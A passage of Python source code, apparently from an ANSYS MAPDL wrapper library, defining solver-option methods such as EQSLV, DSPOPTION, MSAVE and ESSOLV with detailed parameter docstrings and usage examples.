to run in the OUTOFCORE memory mode.
INCORE - Use a memory allocation strategy in the
distributed sparse solver that will attempt to
obtain enough memory to run with the entire
factorized matrix in memory. This option uses the
most amount of memory and should avoid doing any
I/O. By avoiding I/O, this option achieves
optimal solver performance. However, a
significant amount of memory is required to run
in this mode, and it is only recommended on
machines with a large amount of memory. If the
allocation for in-core memory fails, the solver
will automatically revert to out-of-core memory
mode.
OUTOFCORE - Use a memory allocation strategy in the
distributed sparse solver that will attempt to
allocate only enough work space to factor each
individual frontal matrix in memory, but will
store the entire factorized matrix on
disk. Typically, this memory mode results in
poor performance due to the potential
bottleneck caused by the I/O to the various
files written by the solver.
FORCE - This option, when used in conjunction with the
Memory_Size option, allows you to force the
distributed sparse solver to run with a specific
amount of memory. This option is only recommended
for the advanced user who understands distributed
sparse solver memory requirements for the problem
being solved, understands the physical memory on
the system, and wants to control the distributed
sparse solver memory usage.
memory_size
Initial memory size allocation for the sparse solver in
MB. The Memory_Size setting should always be well within
the physical memory available, but not so small as to
cause the distributed sparse solver to run out of
memory. Warnings and/or errors from the distributed sparse
solver will appear if this value is set too low. If the
FORCE memory option is used, this value is the amount of
memory allocated for the entire duration of the
distributed sparse solver solution.
solve_info
Solver output option:
OFF - Turns off additional output printing from the
distributed sparse solver (default).
PERFORMANCE - Turns on additional output printing from the
distributed sparse solver, including a
performance summary and a summary of file
I/O for the distributed sparse
solver. Information on memory usage during
assembly of the global matrix (that is,
creation of the Jobname.FULL file) is also
printed with this option.
Notes
-----
This command controls options related to the distributed sparse solver
in all analysis types where the distributed sparse solver can be used.
The amount of memory required for the distributed sparse solver is
unknown until the matrix structure is preprocessed, including equation
reordering. The amount of memory allocated for the distributed sparse
solver is then dynamically adjusted to supply the solver what it needs
to compute the solution.
If you have a large memory system, you may want to try selecting the
INCORE memory mode for larger jobs to improve performance. Also, when
running the distributed sparse solver with many processors on the same
machine or on a machine with very slow I/O performance (e.g., slow hard
drive speed), you may want to try using the INCORE memory mode to
achieve better performance. However, doing so may require much more
memory compared to running in the OUTOFCORE memory mode.
Running with the INCORE memory mode is best for jobs which comfortably
fit within the limits of the physical memory on a given system. If the
distributed sparse solver workspace exceeds physical memory size, the
system will be forced to use virtual memory (or the system page/swap
file). In this case, it is typically more efficient to run with the
OUTOFCORE memory mode.
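Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session
and that the keyword names match the arguments used in the command
string above; request in-core memory mode and the performance summary:
>>> mapdl.dspoption(memory_option="INCORE", solve_info="PERFORMANCE")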
"""
command = (
f"DSPOPTION,{reord_option},{memory_option},{memory_size},,,{solve_info}"
)
return self.run(command, **kwargs)
def exbopt(
self,
outinv2="",
outtcms="",
outsub="",
outcms="",
outcomp="",
outrm="",
noinv="",
outele="",
**kwargs,
):
"""Specifies .EXB file output options in a CMS generation pass.
APDL Command: EXBOPT
Parameters
----------
outinv2
Output control for 2nd order invariant:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the second order invariant.
outtcms
Output control for .TCMS file:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the .TCMS file.
outsub
Output control for .SUB file:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the .SUB file.
outcms
Output control for .CMS file:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the .CMS file.
outcomp
Output control for node and element component information:
* ``"0"`` : Do not output any component information.
* ``"1"`` : Output node component information only.
* ``"2"`` : Output element component information only.
* ``"3"`` : Output both node and element component information (default).
outrm
Output control for the recovery matrix:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the recovery matrix to file.EXB.
* ``"2"`` : Output the recovery matrix to a separate file, file_RECOVER.EXB.
noinv
Invariant calculation:
* ``"0"`` : Calculate all invariants (default).
* ``"1"`` : Suppress calculation of the 1st and 2nd order
invariants. NOINV = 1 suppresses OUTINV2 = 1.
outele
Output control for the element data:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the element data.
Notes
-----
When the body property file (file.EXB) is requested in a CMS
generation pass (CMSOPT,,,,,,,EXB command), the .TCMS, .SUB, and
.CMS files are not output by default. Use the EXBOPT command to
request these files, as needed.
EXBOPT can also be used to manage some content in the .EXB file
for improving performance and storage (see the OUTINV2, OUTCOMP,
OUTRM, NOINV, and OUTELE arguments described above).
If both recovery matrix output (OUTRM = 1 or 2) and the .TCMS file
(OUTTCMS = 1) are requested, the .TCMS file writing is turned off
due to potentially large in-core memory use.
For more information on how to generate file.EXB, see ANSYS
Interface to AVL EXCITE in the Mechanical APDL Substructuring
Analysis Guide.
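Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
request the .TCMS and .SUB files in addition to the .EXB file:
>>> mapdl.exbopt(outtcms=1, outsub=1)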
"""
command = f"EXBOPT,{outinv2},{outtcms},{outsub},{outcms},{outcomp},{outrm},{noinv},{outele}"
return self.run(command, **kwargs)
def ematwrite(self, key: str = "", **kwargs) -> Optional[str]:
"""Forces the writing of all the element matrices to File.EMAT.
APDL Command: EMATWRITE
Parameters
----------
key
Write key:
YES - Forces the writing of the element matrices to
File.EMAT even if not normally
done.
NO - Element matrices are written only if required. This
value is the default.
Notes
-----
The EMATWRITE command forces ANSYS to write the File.EMAT
file. The file is necessary if you intend to follow the
initial load step with a subsequent inertia relief
calculation (IRLF). If used in the solution
processor (/SOLU), this command is only valid within the
first load step.
This command is also valid in PREP7.
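Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
force the element matrices to be written to File.EMAT:
>>> mapdl.ematwrite("YES")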
"""
command = f"EMATWRITE,{key}"
return self.run(command, **kwargs)
def eqslv(self, lab="", toler="", mult="", keepfile="", **kwargs):
"""Specifies the type of equation solver.
APDL Command: EQSLV
Parameters
----------
lab
Equation solver type:
SPARSE - Sparse direct equation solver. Applicable to
real-value or complex-value symmetric and
unsymmetric matrices. Available only for STATIC,
HARMIC (full method only), TRANS (full method
only), SUBSTR, and PSD spectrum analysis types
[ANTYPE]. Can be used for nonlinear and linear
analyses, especially nonlinear analysis where
indefinite matrices are frequently
encountered. Well suited for contact analysis
where contact status alters the mesh
topology. Other typical well-suited applications
are: (a) models consisting of shell/beam or
shell/beam and solid elements (b) models with a
multi-branch structure, such as an automobile
exhaust or a turbine fan. This is an alternative
to iterative solvers since it combines both speed
and robustness. Generally, it requires
considerably more memory (~10x) than the PCG
solver to obtain optimal performance (running
totally in-core). When memory is limited, the
solver works partly in-core and out-of-core,
which can noticeably slow down the performance of
the solver. See the BCSOPTION command for more
details on the various modes of operation for
this solver.
This solver can be run in shared memory parallel or
distributed memory parallel (Distributed ANSYS) mode. When
used in Distributed ANSYS, this solver preserves all of
the merits of the classic or shared memory sparse
solver. The total sum of memory (summed for all processes)
is usually higher than the shared memory sparse
solver. System configuration also affects the performance
of the distributed memory parallel solver. If enough
physical memory is available, running this solver in the
in-core memory mode achieves optimal performance. The
ideal configuration when using the out-of-core memory mode
is to use one processor per machine on multiple machines
(a cluster), spreading the I/O across the hard drives of
each machine, assuming that you are using a high-speed
network such as Infiniband to efficiently support all
communication across the multiple machines.
This solver supports use of the GPU accelerator capability.
JCG - Jacobi Conjugate Gradient iterative equation
solver. Available only for STATIC, HARMIC (full
method only), and TRANS (full method only) analysis
types [ANTYPE]. Can be used for structural, thermal,
and multiphysics applications. Applicable for
symmetric, unsymmetric, complex, definite, and
indefinite matrices. Recommended for 3-D harmonic
analyses in structural and multiphysics
applications. Efficient for heat transfer,
electromagnetics, piezoelectrics, and acoustic field
problems.
This solver can be run in shared memory parallel or
distributed memory parallel (Distributed ANSYS) mode. When
used in Distributed ANSYS, in addition to the limitations
listed above, this solver only runs in a distributed
parallel fashion for STATIC and TRANS (full method)
analyses in which the stiffness is symmetric and only when
not using the fast thermal option (THOPT). Otherwise, this
solver runs in shared memory parallel mode inside
Distributed ANSYS.
This solver supports use of the GPU
accelerator capability. When using the GPU accelerator
capability, in addition to the limitations listed above,
this solver is available only for STATIC and TRANS (full
method) analyses where the stiffness is symmetric and does
not support the fast thermal option (THOPT).
ICCG - Incomplete Cholesky Conjugate Gradient iterative
equation solver. Available for STATIC, HARMIC (full
method only), and TRANS (full method only) analysis
types [ANTYPE]. Can be used for structural,
thermal, and multiphysics applications, and for
symmetric, unsymmetric, complex, definite, and
indefinite matrices. The ICCG solver requires more
memory than the JCG solver, but is more robust than
the JCG solver for ill-conditioned matrices.
This solver can only be run in shared memory parallel
mode. This is also true when the solver is used inside
Distributed ANSYS.
This solver does not support use of
the GPU accelerator capability.
QMR - Quasi-Minimal Residual iterative equation
solver. Available for the HARMIC (full method only)
analysis type [ANTYPE]. Can be used for
high-frequency electromagnetic applications, and for
symmetric, complex, definite, and indefinite
matrices. The QMR solver is more stable than the
ICCG solver.
This solver can only be run in shared memory parallel
mode. This is also true when the solver is used inside
Distributed ANSYS.
This solver does not support use of
the GPU accelerator capability.
PCG - Preconditioned Conjugate Gradient iterative equation
solver (licensed from Computational Applications and
Systems Integration, Inc.). Requires less disk file
space than SPARSE and is faster for large
models. Useful for plates, shells, 3-D models, large
2-D models, and other problems having symmetric,
sparse, definite or indefinite matrices for
nonlinear analysis. Requires twice as much memory
as JCG. Available only for analysis types [ANTYPE]
STATIC, TRANS (full method only), or MODAL (with PCG
Lanczos option only). Also available for the use
pass of substructure analyses (MATRIX50). The PCG
solver can robustly solve equations with constraint
equations (CE, CEINTF, CPINTF, and CERIG). With
this solver, you can use the MSAVE command to obtain
a considerable memory savings.
The PCG solver can handle ill-conditioned problems by
using a higher level of difficulty (see
PCGOPT). Ill-conditioning arises from elements with high
aspect ratios, contact, and plasticity.
This solver can
be run in shared memory parallel or distributed memory
parallel (Distributed ANSYS) mode. When used in
Distributed ANSYS, this solver preserves all of the merits
of the classic or shared memory PCG solver. The total sum
of memory (summed for all processes) is about 30% more
than the shared memory PCG solver.
toler
Iterative solver tolerance value. Used only with the
Jacobi Conjugate Gradient, Incomplete Cholesky Conjugate
Gradient, Preconditioned Conjugate Gradient, and
Quasi-Minimal Residual equation solvers. For the PCG
solver, the default is 1.0E-8. The value 1.0E-5 may be
acceptable in many situations. When using the PCG Lanczos
mode extraction method, the default solver tolerance value
is 1.0E-4. For the JCG and ICCG solvers with symmetric
matrices, the default is 1.0E-8. For the JCG and ICCG
solvers with unsymmetric matrices, and for the QMR solver,
the default is 1.0E-6. Iterations continue until the SRSS
norm of the residual is less than TOLER times the norm of
the applied load vector. For the PCG solver in the linear
static analysis case, 3 error norms are used. If one of
the error norms is smaller than TOLER, and the SRSS norm
of the residual is smaller than 1.0E-2, convergence is
assumed to have been reached. See Iterative Solver in the
Mechanical APDL Theory Reference for details.
mult
Multiplier (defaults to 2.5 for nonlinear analyses; 1.0
for linear analyses) used to control the maximum number of
iterations performed during convergence calculations. Used
only with the Preconditioned Conjugate Gradient equation
solver (PCG). The maximum number of iterations is equal to
the multiplier (MULT) times the number of degrees of
freedom (DOF). If MULT is input as a negative value, then
the maximum number of iterations is equal to abs(MULT).
Iterations continue until either the maximum number of
iterations or solution convergence has been reached. In
general, the default value for MULT is adequate for
reaching convergence. However, for ill-conditioned
matrices (that is, models containing elements with high
aspect ratios or material type discontinuities) the
multiplier may be used to increase the maximum number of
iterations used to achieve convergence. The recommended
range for the multiplier is 1.0 ≤ MULT ≤ 3.0. Normally, a
value greater than 3.0 adds no further benefit toward
convergence, and merely increases time requirements. If
the solution does not converge with 1.0 ≤ MULT ≤ 3.0, or in
less than 10,000 iterations, then convergence is highly
unlikely and further examination of the model is
recommended. Rather than increasing the default value of
MULT, consider increasing the level of difficulty
(Lev_Diff) on the PCGOPT command.
keepfile
Determines whether files from a SPARSE solver run should be deleted
or retained. Applies only to Lab = SPARSE for static and full
transient analyses.
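Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
select the PCG solver with a tightened tolerance:
>>> mapdl.eqslv("PCG", 1e-8)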
"""
return self.run(f"EQSLV,{lab},{toler},{mult},,{keepfile}", **kwargs)
def eresx(self, key="", **kwargs):
"""Specifies extrapolation of integration point results.
APDL Command: ERESX
Parameters
----------
key
Extrapolation key:
DEFA - If element is fully elastic (no active plasticity, creep, or swelling
nonlinearities), extrapolate the integration point results
to the nodes. If any portion of the element is plastic (or
other active material nonlinearity), copy the integration
point results to the nodes (default).
YES - Extrapolate the linear portion of the integration point results to the nodes
and copy the nonlinear portion (for example, plastic
strains).
NO - Copy the integration point results to the nodes.
Notes
-----
Specifies whether the solution results at the element integration
points are extrapolated or copied to the nodes for element and nodal
postprocessing. The structural stresses, elastic and thermal strains,
field gradients, and fluxes are affected. Nonlinear data (plastic,
creep, and swelling strains) are always copied to the nodes, never
extrapolated. For shell elements, ERESX applies only to integration
point results in the in-plane directions.
This command is also valid in PREP7.
"""
command = f"ERESX,{key}"
return self.run(command, **kwargs)
def escheck(
self, sele: str = "", levl: str = "", defkey: MapdlInt = "", **kwargs
) -> Optional[str]:
"""Perform element shape checking for a selected element set.
APDL Command: ESCHECK
Parameters
----------
sele
Specifies whether to select elements for checking:
(blank) - List all warnings/errors from element shape
checking.
ESEL - Select the elements based on the Levl criteria
specified below.
levl
WARN - Select elements producing warning and error messages.
ERR - Select only elements producing error messages (default).
defkey
Specifies whether the check should be performed on deformed
element shapes.
0 - Do not update node coordinates before performing
shape checks (default).
1 - Update node coordinates using the current set of
deformations in the database.
Notes
-----
Shape checking will occur according to the current SHPP
settings. Although ESCHECK is valid in all processors,
Defkey uses the current results in the database. If no
results are available a warning will be issued.
This command is also valid in PREP7, SOLUTION and POST1.
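Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
select every element that produces a warning or error message:
>>> mapdl.escheck("ESEL", "WARN")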
"""
command = f"ESCHECK,{sele},{levl},{defkey}"
return self.run(command, **kwargs)
def essolv(
self,
electit="",
strutit="",
dimn="",
morphopt="",
mcomp="",
xcomp="",
electol="",
strutol="",
mxloop="",
ruseky="",
restky="",
eiscomp="",
**kwargs,
):
"""Performs a coupled electrostatic-structural analysis.
APDL Command: ESSOLV
Parameters
----------
electit
Title of the electrostatics physics file as assigned by the PHYSICS
command.
strutit
Title of the structural physics file as assigned by the PHYSICS
command.
dimn
Model dimensionality (a default is not allowed):
2 - 2-D model.
3 - 3-D model.
morphopt
Morphing option:
<0 - Do not perform any mesh morphing or remeshing.
0 - Remesh the non-structural regions for each recursive loop only if mesh morphing
fails (default).
1 - Remesh the non-structural regions each recursive loop and bypass mesh morphing.
2 - Perform mesh morphing only, do not remesh any non-structural regions.
mcomp
Component name of the region to be morphed. For 2-D models, the
component may be elements or areas. For 3-D models, the component
may be elements or volumes. A component must be specified. You
must enclose name-strings in single quotes in the ESSOLV command
line.
xcomp
Component name of entities excluded from morphing. In the 2-D
case, it is the component name for the lines excluded from
morphing. In the 3-D case, it is component name for the areas
excluded from morphing. Defaults to exterior non-shared entities
(see the DAMORPH, DVMORPH, and DEMORPH commands). You must enclose
name-strings in single quotes in the ESSOLV command line.
electol
Electrostatic energy convergence tolerance. Defaults to .005 (.5%)
of the value computed from the previous iteration. If less than
zero, the convergence criteria based on electrostatics results is
turned off.
strutol
Structural maximum displacement convergence tolerance. Defaults to
.005 (.5%) of the value computed from the previous iteration. If
less than zero, the convergence criteria based on structural results
is turned off.
mxloop
Maximum number of allowable solution recursive loops. A single
pass through both an electrostatics and structural analysis
constitutes one loop. Defaults to 100.
ruseky
Reuse flag option:
1 - Assumes initial run of ESSOLV using base geometry for
the first electrostatics solution.
>1 - Assumes ESSOLV run is a continuation of a previous
ESSOLV run, whereby the morphed geometry is used for
the initial electrostatic simulation.
restky
Structural restart key.
0 - Use static solution option for structural solution.
1 - Use static restart solution option for structural solution.
eiscomp
Element component name for elements containing initial stress data
residing in file jobname.ist. The initial stress data must be
defined prior to issuing ESSOLV (see INISTATE command).
Notes
-----
ESSOLV invokes an ANSYS macro which automatically performs a coupled
electrostatic-structural analysis.
The macro displays periodic updates of the convergence.
If non-structural regions are remeshed during the analysis, boundary
conditions and loads applied to nodes and elements will be lost.
Accordingly, it is better to assign boundary conditions and loads to
the solid model.
Use RUSEKY > 1 for solving multiple ESSOLV simulations for different
excitation levels (i.e., for running a voltage sweep). Do not issue the
SAVE command to save the database between ESSOLV calls.
For nonlinear structural solutions, the structural restart option
(RESTKY = 1) may improve solution time by starting from the previous
converged structural solution.
For solid elements, ESSOLV automatically detects the air-structure
interface and applies a Maxwell surface flag on the electrostatic
elements. This flag is used to initiate the transfer for forces from
the electrostatic region to the structure. When using the ESSOLV
command with structural shell elements (for example, SHELL181), you
must manually apply the Maxwell surface flag on all air elements
surrounding the shells before writing the final electrostatic physics
file. Use the SFA command to apply the Maxwell surface flag to the
areas representing the shell elements; doing so ensures that the air
elements next to both sides of the shells receive the Maxwell surface
flag.
If lower-order structural solids or shells are used, set KEYOPT(7) = 1
for the electrostatic element types to ensure the correct transfer of
forces.
Information on creating the initial stress file is documented in the
Loading chapter in the Basic Analysis Guide.
Distributed ANSYS Restriction: This command is not supported in
Distributed ANSYS.
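Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
the physics file titles and component name below are illustrative only:
>>> mapdl.essolv("ELECTRO", "STRUCT", 2, mcomp="'MORPH_RGN'")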
"""
command = f"ESSOLV,{electit},{strutit},{dimn},{morphopt},{mcomp},{xcomp},{electol},{strutol},{mxloop},,{ruseky},{restky},{eiscomp}"
return self.run(command, **kwargs)
def expass(self, key="", **kwargs):
"""Specifies an expansion pass of an analysis.
APDL Command: EXPASS
Parameters
----------
key
Expansion pass key:
OFF - No expansion pass will be performed (default).
ON - An expansion pass will be performed.
Notes
-----
Specifies that an expansion pass of a modal, substructure, buckling,
transient, or harmonic analysis is to be performed.
Note: This separate solution pass requires an explicit FINISH to the
preceding analysis and reentry into SOLUTION.
This command is also valid in PREP7.
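Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
turn on the expansion pass:
>>> mapdl.expass("ON")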
"""
command = f"EXPASS,{key}"
return self.run(command, **kwargs)
def gauge(self, opt="", freq="", **kwargs):
"""Gauges the problem domain for a magnetic edge-element formulation.
APDL Command: GAUGE
Parameters
----------
opt
Type of gauging to be performed:
ON - Perform tree gauging of the edge values (default).
OFF - Gauging is off. (You must specify custom gauging via APDL specifications.)
STAT - Gauging status (returns the current Opt and FREQ values)
freq
The following options are valid when Opt = ON:
0 - Generate tree-gauging information once, at the first load step. Gauging data is
retained for subsequent load steps. (This behavior is the
default.)
1 - Repeat gauging for each load step. Rewrites the gauging information at each
load step to accommodate changing boundary conditions on the AZ
degree of freedom (for example, adding or deleting AZ
constraints via the D or CE commands).
Notes
-----
The GAUGE command controls the tree-gauging procedure required for
electromagnetic analyses using an edge-based magnetic formulation
(elements SOLID236 and SOLID237).
Gauging occurs at the solver level for each solution (SOLVE). It sets
additional zero constraints on the edge-flux degrees of freedom AZ to
produce a unique solution; the additional constraints are removed after
solution.
Use the FREQ option to specify how the command generates gauging
information for multiple load steps.
Access the gauging information via the _TGAUGE component of gauged
nodes. The program creates and uses this component internally to remove
and reapply the AZ constraints required by gauging. If FREQ = 0, the
_TGAUGE component is created at the first load step and is used to
reapply the tree gauge constraints at subsequent load steps. If FREQ =
1, the tree-gauging information and the _TGAUGE component are generated
at every load step.
If gauging is turned off (GAUGE,OFF), you must specify your own gauging
at the APDL level.
This command is also valid in PREP7.
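Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
repeat tree gauging at each load step:
>>> mapdl.gauge("ON", 1)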
"""
command = f"GAUGE,{opt},{freq}"
return self.run(command, **kwargs)
def gmatrix(self, symfac="", condname="", numcond="", matrixname="", **kwargs):
"""Performs electric field solutions and calculates the self and mutual
APDL Command: GMATRIX
conductance between multiple conductors.
Parameters
----------
symfac
Geometric symmetry factor. Conductance values are scaled by this
factor which represents the fraction of the total device modeled.
Defaults to 1.
condname
Alphanumeric prefix identifier used in defining named conductor
components.
numcond
Total number of components. If a ground is modeled, it is to be
included as a component.
matrixname
Array name for computed conductance matrix. Defaults to GMATRIX.
Notes
-----
To invoke the GMATRIX macro, the exterior nodes of each conductor must
be grouped into individual components using the CM command. Each set
of independent components is assigned a component name with a common
prefix followed by the conductor number. A conductor system with a
ground must also include the ground nodes as a component. The ground
component is numbered last in the component name sequence.
A ground conductance matrix relates current to a voltage vector. A
ground matrix cannot be applied to a circuit modeler. The lumped
conductance matrix is a combination of lumped "arrangements" of
voltage differences between conductors. Use the lumped conductance
terms in a circuit modeler to represent conductances between
conductors.
Enclose all name-strings in single quotes in the GMATRIX command line.
GMATRIX works with the following elements:
SOLID5 (KEYOPT(1) = 9)
SOLID98 (KEYOPT(1) = 9)
LINK68
PLANE230
SOLID231
SOLID232
This command is available from the menu path shown below only if
existing results are available.
This command does not support multiframe restarts.
Distributed ANSYS Restriction: This command is not supported in
Distributed ANSYS.
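Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
the conductor component prefix below is illustrative only:
>>> mapdl.gmatrix(1, "'COND'", 3, "CONDMTX")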
"""
command = f"GMATRIX,{symfac},{condname},{numcond},,{matrixname}"
return self.run(command, **kwargs)
def lanboption(self, strmck="", **kwargs):
"""Specifies Block Lanczos eigensolver options.
APDL Command: LANBOPTION
Parameters
----------
strmck
Controls whether the Block Lanczos eigensolver will perform a
Sturm sequence check:
* ``"OFF"`` : Do not perform the Sturm sequence check
(default).
* ``"ON"`` : Perform a Sturm sequence check. This requires
additional matrix factorization (which can be expensive),
but does help ensure that no modes are missed in the
specified range.
Notes
-----
LANBOPTION specifies options to be used with the Block Lanczos
eigensolver during an eigenvalue buckling analysis (BUCOPT,LANB)
or a modal analysis (MODOPT,LANB).
By default, the Sturm sequence check is off for the Block Lanczos
eigensolver when it is used in a modal analysis, and on when it is
used in a buckling analysis.
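Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
enable the Sturm sequence check:
>>> mapdl.lanboption("ON")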
"""
return self.run(f"LANBOPTION,{strmck}", **kwargs)
def lumpm(self, key="", **kwargs):
"""Specifies a lumped mass matrix formulation.
APDL Command: LUMPM
Parameters
----------
key
Formulation key:
OFF - Use the element-dependent default mass matrix formulation (default).
ON - Use a lumped mass approximation.
Notes
-----
This command is also valid in PREP7. If used in SOLUTION, this command
is valid only within the first load step.
"""
command = f"LUMPM,{key}"
return self.run(command, **kwargs)
def moddir(self, key="", directory="", fname="", **kwargs):
"""Activates the remote read-only modal files usage.
APDL Command: MODDIR
Parameters
----------
key
Key to activate the remote modal files usage
* ``"1 (ON or YES)"`` : The program performs the analysis
using remote modal files. The files are read-only.
* ``"0 (OFF or NO)"`` : The program performs the analysis
using modal files located in the working directory
(default).
directory
Directory path (248 characters maximum). The directory
contains the modal analysis files. The directory path
defaults to the current working directory.
fname
File name (no extension or directory path) for the modal
analysis files. The file name defaults to the current
Jobname.
Notes
-----
Only applies to spectrum analyses (ANTYPE,SPECTR).
Using the default for both the directory path (Directory) and the
file name (Fname) is not valid. At least one of these values must
be specified.
The MODDIR command must be issued during the first solution and at
the beginning of the solution phase (before LVSCALE in
particular).
Remote modal files usage is not supported when mode file reuse is
activated (modeReuseKey = YES on SPOPT).
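Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
the directory and file name below are illustrative only:
>>> mapdl.moddir(1, "/scratch/modal_run", "modaljob")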
"""
return self.run(f"MODDIR,{key},{directory},{fname}", **kwargs)
def monitor(self, var="", node="", lab="", **kwargs):
"""Controls contents of three variable fields in nonlinear solution
APDL Command: MONITOR
monitor file.
Parameters
----------
var
One of three variable field numbers in the monitor file whose
contents can be specified by the Lab field. Valid arguments are
integers 1, 2, or 3. See Notes section for default values.
node
The node number for which information is monitored in the specified
VAR field. In the GUI, if Node = P, graphical picking is enabled.
If blank, the monitor file lists the maximum value of the specified
quantity (Lab field) for the entire structure.
lab
The solution quantity to be monitored in the specified VAR field.
Valid labels for solution quantities are UX, UY, and UZ
(displacements); ROTX, ROTY, and ROTZ (rotations); and TEMP
(temperature). Valid labels for reaction force are FX, FY, and FZ
(structural force) and MX, MY, and MZ (structural moment). Valid
label for heat flow rate is HEAT. For defaults see the Notes
section.
Notes
-----
The monitor file always has an extension of .mntr, and takes its file
name from the specified Jobname. If no Jobname is specified, the file
name defaults to file.
You must issue this command once for each solution quantity you want to
monitor at a specified node at each load step. You cannot monitor a
reaction force during a linear analysis. The variable field contents
can be redefined at each load step by reissuing the command. The
monitored quantities are appended to the file for each load step.
Reaction forces reported in the monitor file may be incorrect if the
degree of freedom of the specified node is involved in externally
defined coupling (CP command) or constraint equations (CE command), or
if the program has applied constraint equations internally to the node.
The following example shows the format of a monitor file. Note that
the file only records the solution substep history when a substep is
convergent.
The following details the contents of the various fields in the monitor
file:
The current load step number.
The current substep (time step) number.
The number of attempts made in solving the current substep. This
number is equal to the number of failed attempts (bisections) plus one
(the successful attempt).
The number of iterations used by the last successful attempt.
Total cumulative number of iterations (including each iteration used by
a bisection).
Time or load factor increments for the current substep.
Total time (or load factor) for the last successful attempt in the
current substep.
Variable field 1. In this example, the field is reporting the UZ
value. By default, this field lists the CPU time used up to (but not
including) the current substep.
Variable field 2. In this example, the field is reporting the MZ
value. By default, this field lists the maximum displacement in the
entire structure.
Variable field 3. By default (and in the example), this field reports
the maximum equivalent plastic strain increment in the entire
structure.
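Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
the node number below is illustrative only:
>>> mapdl.monitor(1, 25, "UZ")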
"""
command = f"MONITOR,{var},{node},{lab}"
return self.run(command, **kwargs)
def msave(self, key="", **kwargs):
"""Sets the solver memory saving option. This option only applies to the
APDL Command: MSAVE
PCG solver (including PCG Lanczos).
Parameters
----------
key
Activation key:
0 or OFF - Use global assembly for the stiffness matrix (and mass matrix, when using PCG
Lanczos) of the entire model.
1 or ON - Use an element-by-element approach when possible to save memory during the
solution. In this case, the global stiffness (and mass)
matrix is not assembled; element stiffness (and mass) is
regenerated during PCG or PCG Lanczos iterations.
Notes
-----
MSAVE,ON only applies to and is the default for parts of the model
using the following element types with linear material properties that
meet the conditions listed below.
SOLID186 (Structural Solid only)
SOLID187
The following conditions must also be true:
The PCG solver has been specified.
Small strains are assumed (NLGEOM,OFF).
No prestress effects (PSTRES) are included.
All nodes on the supported element types must be defined (i.e., the
midside nodes cannot be removed using the EMID command).
For elements with thermally dependent material properties, MSAVE,ON
applies only to elements with uniform temperatures prescribed.
The default element coordinate system must be used.
If you manually force MSAVE,ON by including it in the input file, the
model can include the following additional conditions:
The analysis can be a modal analysis using the PCG Lanczos method
(MODOPT,LANPCG).
Large deflection effects (NLGEOM,ON) are included.
SOLID185 (brick shapes and KEYOPT(2) = 3 only) elements can be
included.
All other element types or other parts of the model that don't meet the
above criteria will be solved using global assembly (MSAVE,OFF). This
command can result in memory savings of up to 70 percent over the
global assembly approach for the part of the model that meets the
criteria. Depending on the hardware (e.g., processor speed, memory
bandwidth, etc.), the solution time may increase or decrease when this
feature is used.
This memory-saving feature runs in parallel when multiple processors
are used with the /CONFIG command or with Distributed ANSYS. The gain
in performance with using multiple processors with this feature turned
on should be similar to the default case when this feature is turned
off. Performance also improves when using the uniform reduced
integration option for SOLID186 elements.
This command does not support the layered option of the SOLID185 and
SOLID186 elements.
When using MSAVE,ON with the PCGOPT command, note the following
restrictions:
For static and modal analyses, MSAVE,ON is not valid when using a
Lev_Diff value of 5 on the PCGOPT command; Lev_Diff will automatically
be reset to 2.
For modal analyses, MSAVE,ON is not valid with the StrmCk option of the
PCGOPT command; Strmck will be set to OFF.
For all analysis types, MSAVE,ON is not valid when the Lagrange
multiplier option (LM_Key) of the PCGOPT command is set to ON; the
MSAVE activation key will be set to OFF.
For linear perturbation static and modal analyses, MSAVE,ON is not
valid; the MSAVE activation key will be set to OFF.
When using MSAVE,ON for modal analyses, no .FULL file will be created.
The .FULL file may be necessary for subsequent analyses (e.g.,
harmonic, transient mode-superposition, or spectrum analyses). To
generate the .FULL file, rerun the modal analysis using the WRFULL
command.
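Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
activate the element-by-element memory saving approach:
>>> mapdl.msave("ON")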
"""
command = f"MSAVE,{key}"
return self.run(command, **kwargs)
def msolve(self, numslv="", nrmtol="", nrmchkinc="", **kwargs):
"""Starts multiple solutions for random acoustics analysis with diffuse
APDL Command: MSOLVE
sound field.
Parameters
----------
numslv
Number of multiple solutions (load steps) corresponding to the
number of samplings. Default = 1.
nrmtol
Norm convergence tolerance on the averaged radiated sound powers
used to stop the multiple solutions (see Notes).
nrmchkinc
Interval, in number of solutions, at which the norm convergence
check is performed (see Notes).
Notes
-----
The MSOLVE command starts multiple solutions (load steps) for random
acoustics analysis with multiple samplings.
The process is controlled by the norm convergence tolerance NRMTOL or
the number of multiple solutions NUMSLV (if the solution steps reach
the defined number).
The program checks the norm convergence by comparing two averaged sets
of radiated sound powers with the interval NRMCHKINC over the frequency
range. For example, if NRMCHKINC = 5, the averaged values from 5
solutions are compared with the averaged values from 10 solutions, then
the averaged values from 10 solutions are compared with the averaged
values from 15 solutions, and so on.
The incident diffuse sound field is defined via the DFSWAVE command.
The average result of multiple solutions with different samplings is
calculated via the PLST command.
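Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
request 20 samplings (load steps):
>>> mapdl.msolve(20)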
"""
command = f"MSOLVE,{numslv},{nrmtol},{nrmchkinc}"
return self.run(command, **kwargs)
def opncontrol(self, lab="", value="", numstep="", **kwargs):
"""Sets decision parameter for automatically increasing the time step
APDL Command: OPNCONTROL
interval.
Parameters
----------
lab
DOF - Degree-of-freedom label used to base a decision for increasing the time step
(substep) interval in a nonlinear or transient analysis.
The only DOF label currently supported is TEMP.
